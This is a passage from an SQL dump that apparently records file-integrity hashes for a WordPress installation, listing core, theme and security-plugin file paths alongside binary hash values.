-��q���?b׍�^�','f2\"�c`��}�`��·����֑��ѕl�o','',0,'?'),('��@��{�J��5䷴X','wp-includes/js/tinymce/skins/wordpress/images/playlist-audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U,�:)��؋\"�QqY','\"�Oo�ۈ���<��oES-MO÷�YN�!��','',0,'?'),('����V�h��G�!�j\'','wp-content/plugins/wp-cerber/assets/flags/jm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b��F/�+�d9','\n�Ƽ�H�_���T�T�2�[�_��ox�u�','',0,'?'),('����L��6	��׳','wp-includes/ID3/module.audio.ac3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>Y����\Zk0�aM','�b��^#��¨(t�^�rߘz���9�F���','',0,'?'),('��T��V���\\��','wp-admin/import.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�֒��y�DБ�#�','L��)Ӊ�\"�.4l��N�U�7�+#��R}���','',0,'?'),('���Nt�K�U��','wp-includes/Requests/Exception/HTTP/407.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v����j&�Ƶ','>\Z���]ƚ�B̏Xv�ذc����.N2�NҹЯ','',0,'?'),('�ܵ[Ҳm%�6�S8:D','wp-includes/images/toggle-arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��·�a��;�d��*�','[b\Z���;�]�f�0���s|:�����%','',0,'?'),('��!ެ��߳���p','wp-includes/images/crystal/default.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�>)*/��!�-�','���n$���_�u	�$Q3��E�׏r�|Jm�','',0,'?'),('���#�V(k]$����(','wp-content/themes/twentynineteen/sass/elements/_tables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�\"MY���~��','�lG����w��}V���>��%{n��\\�z��;�','',0,'?'),('���I	2�R�NjY��','wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����v�\rs*�\\�','��O�Z=�<�3S�t�Q����_�u;�	m8','',0,'?'),('�&�M�X��W��O�','wp-includes/error-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?5�p��.9�;F�ܧ�','֦ �7S�\Z�\\��cdLb|o�1��Y�ã��:','',0,'?'),('�7j���7d�A��(=','wp-content/themes/magazine-hoot/include/admin/images/sidebar-wide-left.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y����WSFE�vc�\'','Ӊ�~��eh����΋\'$��x͂v�Cy�z�G�','',0,'?'),('�S�򽟈b�eL��','wp-content/plugins/wp-cerber/assets/flags/be.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YZx��ʭ��T�/� �','4�nMM��e)񤉓��<�Ia�P�1�K�~#`G','',0,'?'),('�\\p�+���a=a1:P�#','wp-content/plugins/wordfence/css/activity-report-widget.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�^x;y�����c���','�ӡ��f�aM�Wv+�W�%}��`D�N��','',0,'?'),('�h�����FuQe� �','wp-includes/images/wlw/wp-comments.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�6]P����.s���','�zl\Z��C��D���#�a�N��3\'XZ�','',0,'?'),('�u1HM:E7/�{�','wp-admin/includes/class-wp-site-health.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�-I��:�����9�+','Y��z���W2|{}1и����^�iN�q�C�Y�','',0,'?'),('��ZԬ=!Ri=�7�h�','wp-includes/js/dist/vendor/wp-polyfill-object-fit.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j	\r�<l�J�l�','[�a6$sp8����Y�Q�\'��1��\0�Dح','',0,'?'),('�ǀ3�<��&��YĆ','wp-includes/class-wp-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?T�v���|U�y','?}]�����b4\0����J�� ��5�.��1U','',0,'?'),('��f0��ͭ��~�)','wp-includes/fonts/dashicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�_rY+ʂ;�','��yU�]f��8���t�����l�L.','',0,'?'),('��.�IOI�P��%�)','wp-includes/Requests/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;�k���K\\Vl�','ɯO3e���F��㛆��v+����.r/�>�,','',0,'?'),('��MO,���s���\r��','wp-includes/class-wp-http-encoding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Usg2eޫj9�EA����','t��1��XZ��C�9��c��x](D[9��O�','',0,'?'),('�|�aV��~�[f��.','wp-content/themes/twentynineteen/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�{.�b:N���,n�','�J�q[9w��!\0�|b���n�Q���\'i�M��','',0,'?'),('�!ۅ.�4��qdtP��','wp-content/plugins/akismet/views/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{ETJ�_q���n���','·^\n�b��q<v`x��K���Z�W��>�Gw��','',0,'?'),('�#ynہ彐[hr\\�U','wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@����{�Թ6','�دh\Z�o�>���:즱�l� 5D�_�\'-�w','',0,'?'),('�6�|;�;8�Q�4�k��','wp-admin/install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^�&8�]=	����R','h�Q�4n��ńY�9��޿�-ǚ7F�&8���ܷ','',0,'?'),('�9�e�E��bݾl�3�','wp-includes/js/wp-lists.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��uP��*�L�[�C�','!��JL=�Tl̞_p@��ȟ���R��M��S[','',0,'?'),('�W��f�0�\n�D	�/\'','wp-content/plugins/wp-cerber/assets/flags/km.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%������&\'z���V',';��NS6����:����݇�u͙�r�x� ','',0,'?'),('�sUK�|E]M-\n�i�C\\','wp-content/themes/magazine-hoot/include/admin/widget-post-grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�,���O�����','� ̃�H�^�.���O��}�ePƩ�t�d+4	','',0,'?'),('�z9�	�`�d3�\0�Iay','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �@��^����8J','��ؽ�@��B-K���m���-Ȼ��\Z�2p','',0,'?'),('���*r%Y�3/�hN�p','wp-content/plugins/wp-cerber/assets/flags/sb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�5J��䈒?Qo�<','����T�	k��w#�����Af�3A2�͂M','',0,'?'),('��\Z5o��#R\'/��l','wp-includes/fonts/dashicons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N\Z>w���@�R-/Y�','B\nZ\Z��_p�n͂��Q?/�\r3s�}���)','',0,'?'),('��w�#�Q������','wp-content/plugins/akismet/views/predefined.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#>ajϬa�����4�','�w�s��bN}�qY��7zo�U��u�\'���1','',0,'?'),('����E�?��Юᾠ','wp-includes/js/media-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J虝���\n�G{5�','�7�ϝ���P9n)%�-�i�Qԭv���kJ���','',0,'?'),('� �v����bu)','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G�r����]��/�','yus���Կ�����:�\0)�y�zs�ݿSkH�','',0,'?'),('���R:^�e+x2��c','wp-includes/PHPMailer/SMTP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,k�)����X','��>��|F��j�e�<;E�Tr�ۭe��wO','',0,'?'),('��WEv����h�','wp-content/themes/magazine-hoot/js/jquery.fitvids.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#�5��-&Dh*ҏ','.p<��BA��@��Sx��LC�W`�=\n0�`�','',0,'?'),('��Cg����}|�E��','wp-admin/js/word-count.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I)�\r�]�X0�h5�\n�','�\\DE����lV�����Hk��\\N�A3���','',0,'?'),('�	v�O.�|ߤҵ�','wp-includes/js/tinymce/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�����x:�`����','Y��#wO�g^\'�b��:�^�	=跨|��','',0,'?'),('�*\0�U\'-,�M�','wp-content/themes/twentynineteen/inc/template-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=#kQ\n�z��݋C','�uC���#ďAUf{Kb�|�\ZIl�L���٩','',0,'?'),('�Lߨ�Ϥ�(��R�','wp-admin/css/code-editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��gq���i�s�픋-','�~:\"�`�he&@��*����A�����','',0,'?'),('�fY5��4,󫞩�','wp-content/themes/magazine-hoot/include/admin/images/2-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',!���\nC� ;�3','�%0<��fu*R�%�y{F{�#NM&؍��	�+y','',0,'?'),('�k�|DD��*@4�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\nAgv��1P�ص','����0o*\r��vA�o�3���:��j�u���y','',0,'?'),('��6��:�$4�-Tg5','wp-content/themes/twentynineteen/sass/elements/_lists.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��	���L`򊘖B[','���V\"��\ZkY�cnUkYY$-,��y�\r�','',0,'?'),('��p��K�b��\0!�(��','wp-includes/css/dist/block-directory/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ˆ�gJ��^<','���\ZybF���v��J�}�z��Lj��	(','',0,'?'),('��{�YsC1\"/�U�n�','wp-content/themes/magazine-hoot/include/admin/images/4-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4m�6)^qyy���v�n�','h�S.��l[��z�^ذ�ă�p2*t7=Vu�K��','',0,'?'),('��hxh�M*����S�','wp-content/plugins/wp-cerber/assets/flags/bn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C.M��sg:��','s�@�Zd}���x���-r���^�x8Z.���','',0,'?'),('�쐛��[Za�I�vj','wp-content/themes/magazine-hoot/css/lightSlider.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A��yQ*t�\r�','��Ք8��\0�<).iu�+����2ִ��P�hYl','',0,'?'),('��|�~�������','wp-includes/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')6��):�������','H0��L�ї?�㞹�.1�M�Ie��٣�','',0,'?'),('��b�������|e~�','wp-admin/css/customize-widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��]&?��I*1�e','�s������Wk�B��$oG��N��\n���','',0,'?'),('���L�\"�=����)','wp-content/themes/magazine-hoot/hybrid/css/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�KV��m�L�I\\U','�-0U��?.�!��᫗�\Z1���Gȧ�8�','',0,'?'),('���al�V�?�f�\Zё�','wp-includes/IXR/class-IXR-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Y�+�=#��}9�K�','X����ק�YWo�L�v�؊�n�A	C�','',0,'?'),('�\0h�Kf��\0�','wp-content/plugins/wordfence/images/forward_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\0/3e4e�����','0��Q7018�ު9-�z9ؽq��SrĒ�P��','',0,'?'),('����Ž��H�06�','wp-admin/images/browser.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ž�K\\�b�$�F','&$�ĉ9����~_SH�_�̓�%L���\'&�','',0,'?'),('����8(\Z�j�Z]}','wp-includes/js/jquery/ui/effect-pulsate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\0�q2�l����d','ȩ~��0M���0\"���7	]1�sP�J�T','',0,'?'),('�-�(ҟ�oF�L���','wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ5�/�ҲP��C','�[T����4Gzݹo�ɓHL4�` �(��;�Gc','',0,'?'),('�X�R�ev�� O��U','wp-includes/blocks/quote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N`�^/��(��ǝ2�=','/{��Oe;gt@aݸG	�/1Sv>��e̢kE','',0,'?'),('�X����g5��(�=c','wp-includes/js/tinymce/skins/lightgray/img/trans.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7I �1F�Gu�j^','�� �û���ͥJ��O�mO�:ϙ���l�W�5','',0,'?'),('�h�w^�(�n���','wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5+I6N,^�~��','x�u]!�%�\Z�|8c�˹��?�<M+GG������','',0,'?'),('�pt_ Y����7L�Kt','wp-admin/css/deprecated-media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uְ�Z�l�\"�','�����K��ṥ�=���$�ϻ���]�C�i','',0,'?'),('�������X�\0T�O��','wp-content/themes/twentynineteen/sass/navigation/_links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h�,���	p�A��','\0�4݌����^\ZY��i�_�O��_�#','',0,'?'),('���\'(jli�����','wp-content/themes/twentytwenty/template-parts/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R0�5����wT��','�+�\\@o�g���\n�@��������','',0,'?'),('����T��D��F�K1�','wp-admin/css/media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9��V80*�','\0-��ZGhV¥�\'�U\\ �����%d�','',0,'?'),('��˳�}��N�3+Mg','wp-content/plugins/wordfence/js/jquery.tools.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:-��Eՠx�$�B',',�4�~aT�lS �fQO	f���Tӵ��;��)','',0,'?'),('��/GΞӶ[�ǜ��C','wp-admin/js/gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kt���q	�x','��7`YՓ<���9Y�i�l�۪�Kȯ��','',0,'?'),('���[�/�9}�`:w�P','license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��{�\0S�g��D���','��ы��I<�m�db�}��̑x��V�5/����','',0,'?'),('��:̔��\'���b�K','wp-content/themes/magazine-hoot/js/modernizr.custom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<T�5�XV�T�����m','pT�\0aփ\'�Z�5S�#�P�|p���\r��4%','',0,'?'),('���7�%�̬���&�','wp-includes/css/dist/block-library/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��XBI���mC�','Q�E��e��\r��_�1�Pj���W�r�','',0,'?'),('�\0�����.}�fwA','wp-includes/date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n[*(Ҿ�w.m�y�z�','�.��\0�qB_]������\0��a�}��\0�','',0,'?'),('�.���FC�p���3��','wp-content/plugins/wordfence/js/wfdropdown.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����rp��c\'\Z�','��SG��s8;�Z�!�זJ�u�1�z?���','',0,'?'),('�[���QH\"pS1Ȫ�c','wp-admin/images/arrows-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� Q�}��ydb#6�','�,c�˿\Z�i(~���)����\'��8[A�/�I��x','',0,'?'),('�kLǤe���(�ȸK','wp-content/plugins/wp-cerber/assets/flags/ch.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�k�g�iT���I�ކ','R���:�=b���U|O@��R�˂}��-','',0,'?'),('��[ixT�q��~Wv�e','wp-admin/network/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�JY��Fq�^��N�','z��w�iL�_�*�	!$c��L*�T�qDN_','',0,'?'),('��F~���y�c7v-','wp-includes/js/customize-preview-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�m�	i13-����','��%N�q�4��6�\n$^o����Ĝ7k��.�','',0,'?'),('��H��_X�Ѕ�gU','wp-content/themes/twentytwentyone/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oL6-!讜k���y�t','��\0�<w����3=S��wT-|\"��uV�c � w','',0,'?'),('��\n5�Do��9�gzg��','wp-content/themes/magazine-hoot/hybrid/extend/customize/sanitization.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�5F�@8��E��j\n#�','ϟ�k>����v�gi�d�w)X	%4a(��','',0,'?'),('��޸��Ѥ;D���','wp-content/plugins/wp-cerber/assets/flags/jp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Jn@��Aל^�','��7���^qU���` ��	�}wͧ�h��','',0,'?'),('�䑖�w�7:\'�h*','wp-includes/js/dist/vendor/lodash.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2n�B2���]�� �','\"��Qe��\\NJhb�Bj�{i�J\n�Қi;eZ�3','',0,'?'),('���2���:�����','wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b4�\'��&��','ۼ�4P\'���hN�a�>���E�5ఛ','',0,'?'),('�\Z-��x7�(A�4���','wp-includes/js/swfupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�`�^�-�o�QWz','��:)��6�a\"3r��\rP\rN�4�yJ�ַ��U�q','',0,'?'),('�(��\"����?4U','wp-content/themes/twentytwenty/assets/css/editor-style-classic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Vn-�C^�j�','CQA�FFC�z�R[ZM`�Gbf�2�A�pЋ���','',0,'?'),('�1W;c�����N�\"�u','wp-includes/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����p�5yN.��&','�Ό��!-�ʉ�^;�#��Ut�\n�W^���YG5','',0,'?'),('�J��B�GT�;,l��T','wp-includes/images/smilies/icon_exclaim.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\\��>5�\0r���sg�','�L�ɵ�H��A(�xʓ2�EP%�	��#���#�5','',0,'?'),('�V�^�3��m6�._P','wp-includes/customize/class-wp-customize-background-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�@�t��j23��W','�4���0^+�u*�:ޓ4q[#��O��m�&�','',0,'?'),('�x�N%>\"1 ����k!,','wp-content/themes/magazine-hoot/hybrid/css/customize-controls.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ک��0�W7��x�X','�ZR��n��~F|��{R�Jq��a}�ʃP�','',0,'?'),('�����[���D?_�[�','wp-includes/random_compat/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4������Տ��d�','�I�n��6��_����ga8��y��].��','',0,'?'),('���7�M3š�$��','wp-includes/images/smilies/icon_question.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[-\0�\'��W��F','�7b��|6#����9/?x��~��[��%t','',0,'?'),('����2@�k�w>K�2','wp-includes/feed-atom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\r�g�\'SkI�fe�p�','!�I��m\nY��f+̕�P\0����13�\\=��','',0,'?'),('����H\0ۙ��h�C��','wp-admin/css/colors/ectoplasm/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�؄D���9�j�K\\','~�2��H�3��.�4�\"���Fo�W��^܉','',0,'?'),('��wt�H���-s�\0�n','wp-includes/js/wplink.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7\"U��\"�?���','S\\��	���ٺ�\'?��I��75�{','',0,'?'),('���=֬H�@-i��','wp-includes/css/admin-bar-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����r���ju',',t�c*	2�����3ئI����4�j','',0,'?'),('�֔��ߚy(qD�w�','wp-content/plugins/wordfence/models/common/wfGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YJs@j���r�jtm','�3ÑѲs��\r&�z=���ds��pJx�3�w','',0,'?'),('��h�L���JH�X#0','wp-content/plugins/wordfence/lib/wfUnlockMsg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�c)��Re�Y�l�7��','.�`�i�W�	t1�}�sty�ɪ���!K','',0,'?'),('����Kǥݳ�|u��','wp-content/themes/twentytwentyone/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�:/=�P�|Ds�)�','v|�^�ц��E�O�x���̠R��ƌ$��G','',0,'?'),('���f�͢�����F�','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-solid-900.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� CP�gf�U��\n.�','\r�J6�{�#63��O-���Q�ș�\nʆ�\\','',0,'?'),('��h�_��-�\rus{t�','wp-content/plugins/wp-cerber/assets/flags/bd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_R�jQ�k.��4','k�j8�F��/���)�5��aC�,�12O�H\'','',0,'?'),('���^��\'�q���0��','wp-links-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ln��j�\\w�X=7I','7���\"1j��L?9Y�\"��&���kŌVD�|��','',0,'?'),('�%n��Tߒ	^�gXΰ','wp-admin/js/inline-edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ub��:\\22B�E�C��','C��{�/I~�޸�\Z\"\"e�UT��B���ވg','',0,'?'),('�3��aD�w�P����q','wp-admin/includes/class-theme-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڪ&��텾��U�7y','��-R��RlG���cR�K��������a:���*>','',0,'?'),('�G���M�.��','wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xY� i��F욤yG�','Z{���L��� �GNJ��\n�	����⪋��','',0,'?'),('�L(,�.����ZP/:�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('��n&���n�!崬�','wp-admin/css/site-icon.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�ˁx�J��TG���','�+���W���V��3�(qF���r;�|^�@��','',0,'?'),('����EX���|T��','wp-includes/blocks/media-text/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�0�y���~_>2�','ɗU�(���S�t��R��QYq�ex}I\'��P','',0,'?'),('��>�\r�p���ް�[k','wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-brands-400.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K(�\"O&�XH��\n2','&Ŗ��>}�<�t�#�Joʫ���i�Eq<�.','',0,'?'),('��Vr^T2���X�O���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�B�	�?�{n��\Z','t�����p1��\ZQU�|O���\Z(0�\"tV[','',0,'?'),('��Y[ ��8T���\n\"','wp-content/themes/magazine-hoot/include/admin/images/archive-medium.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���z���Pa�`\0桧','�wgnO�\0�,].W�#�4�D,�l�o���B=','',0,'?'),('��]j�l�\'��/x5','wp-includes/js/wp-sanitize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:k���E�t6Q��','yΦV�� }ɛq����K>ۈP6��*��C\ns}','',0,'?'),('���W��{�\\,�Yu�','wp-includes/js/jquery/ui/effect-explode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���i!1��	�','s��e=\'���ڜ�N�I�{�U�!�M�E�s','',0,'?'),('��71���}\n��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�2+;�F���нNM��','�w��\"�*��5�U T@��nyȳ�^a�u��\'','',0,'?'),('�\'��Fs�[�ט���','wp-content/themes/magazine-hoot/hybrid/extend/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�,���C]An��?','6�lpo���0mŴB�$�q���7�ܩ<\'z�ˆ','',0,'?'),('�,�{�vF��ߝ��','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('�2X69G3�\Z�+}A�6','wp-content/plugins/wordfence/views/waf/option-whitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@7���#{X��q��','J���n�������Pq��/�\Z�n\n��l�V','',0,'?'),('�5����\r��k��','wp-admin/js/color-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����zhg\0~���','=k�jY�8�8r�a���hI�:Rի9��i��É','',0,'?'),('�8�������P5aĨ�	','wp-includes/images/smilies/icon_wink.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e?2���i����','�(���V��{�V�Bk����o(`Z��V	6','',0,'?'),('�����y85���æb�','wp-admin/css/colors/sunrise/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z��t��b傽�','�]�\0�mXٕ���Ç?���L�d�rHyʧ','',0,'?'),('��l�3.	XN�','wp-includes/Requests/Exception/HTTP/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`�\r�o��k3��1�','�I�l�E�K�Ѧ��?Z�0JT�����U�','',0,'?'),('��{�1u�.b}κ0$�','wp-content/plugins/wp-cerber/assets/flags/bi.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',|��\\_��27�k��	','v����JȢ�\"DWK�9q	�Q�^F%a�A','',0,'?'),('����PQ�E|E}7+','wp-admin/includes/class-wp-filesystem-ftpsockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�/CO\Z>yCiϼ�2�','�9�{��pZ�I�͖��w[Y��.2�l�7�౵�','',0,'?'),('��U���$�\\*�1^�S�','wp-includes/js/jquery/ui/effect-clip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��=�����:�	s','��tw�:��o,�u3Mxm���x�H ��gC��','',0,'?'),('����P�J�t��1z','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��wU ��ې6M�\\�8','<����\0�\rIB=\"�P8D�\"�����L~�I[','',0,'?'),('����_�� �\0*�O','wp-includes/rest-api/endpoints/class-wp-rest-site-health-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��u��tu�+]�a','�\n�1�IJ��A��P3����C\0{K7QO��f�','',0,'?'),('��P\Z��/���l%�','wp-includes/js/jquery/jquery.hotkeys.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��hI�QLZA$Un�H�','��T����f�RMS�9º��MDR��R��N�','',0,'?'),('�\0� ��k~��U5T','wp-includes/widgets/class-wp-widget-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;���\r9!�5�P�','Y����7%��Z�Gݠ\Z��ӊr�cI�ϸ','',0,'?'),('�	J.�\'��Vn{�|�T�','wp-content/plugins/wp-cerber/assets/bgwidget.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PM6ev����3���','��F.�F��3��r5�e�*\rl��������3\r','',0,'?'),('�\n%f[!aE�r�tg�i','wp-includes/images/media/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����u�h����q��','DBU����MiO�b�,���e��=��W�{���','',0,'?'),('�&�S짿o�$�0�n','wp-includes/author-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','©ei+`љ�[��>q','kt0���6�;��^@�ê��R Β�6�9r߯','',0,'?'),('�\'P��T]�	